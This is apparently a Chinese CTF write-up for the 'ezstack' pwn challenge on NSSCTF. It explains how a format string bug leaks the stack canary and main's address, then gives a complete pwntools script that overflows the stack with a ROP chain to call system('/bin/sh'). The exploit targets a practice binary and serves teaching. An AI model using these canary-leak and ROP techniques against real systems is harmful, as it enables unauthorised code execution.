首先拿到附件先checksec~
保护基本上全开了
ida康康
漏洞非常明显,格式化字符串加栈溢出
那么思路就是先通过格式化字符串泄露canary和函数真实地址,然后栈溢出返回shell
甚至给了后门,他真的,我哭死。
然后就是调试
下断点在printf,运行,再输入一串%p
然后看栈
他甚至连canary都放的这么明显(0x7fffffffdf08)
而且canary往下第六个参数存放了main函数的地址(0x7fffffffdf28)
所以输入的格式化字符串为%11$p和%17$p(记得前六个参数存放在寄存器里)输入到第一个read中
泄露代码如下
payload = '%17$p'+'%11$p'
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
canary = int(io.recvuntil("00"),16)
然后在下一个read中根据main函数基址算偏移泄露其他部分构造rop链即可。
完整exp如下:
from pwn import*
io = remote('node4.anna.nssctf.cn',28459)
#io = process('./ezstack')
context.log_level = 'debug'
payload = '%17$p'+'%11$p'
elf = ELF('./ezstack')
io.sendline(payload)
addr = int(io.recv(14).decode(),16)
addrx = hex(addr)
print('main:')
print(addrx)
canary = int(io.recvuntil("00"),16)
canaryn = hex(canary)
print('canary:')
print(canaryn)
binsh = 0xb24
system = elf.sym['system']
main = 0x9dc
pro_base = addr-main
binsh_addr = pro_base + binsh
sys_addr = pro_base + system
binshn = hex(binsh_addr)
systema = hex(sys_addr)
rdi = pro_base + 0xb03//用Ropgadget找
ret = pro_base + 0x7c1
print(binshn)
print(systema)
payload2 = b'a'*(0x20-8)+p64(canary)+b'a'*8+p64(ret)+p64(rdi)+p64(binsh_addr)+p64(sys_addr)//记得用ret和ret_rdi传参
io.sendlineafter('--+--\n',payload2)
io.interactive()
成功getshell
希望对各位有所帮助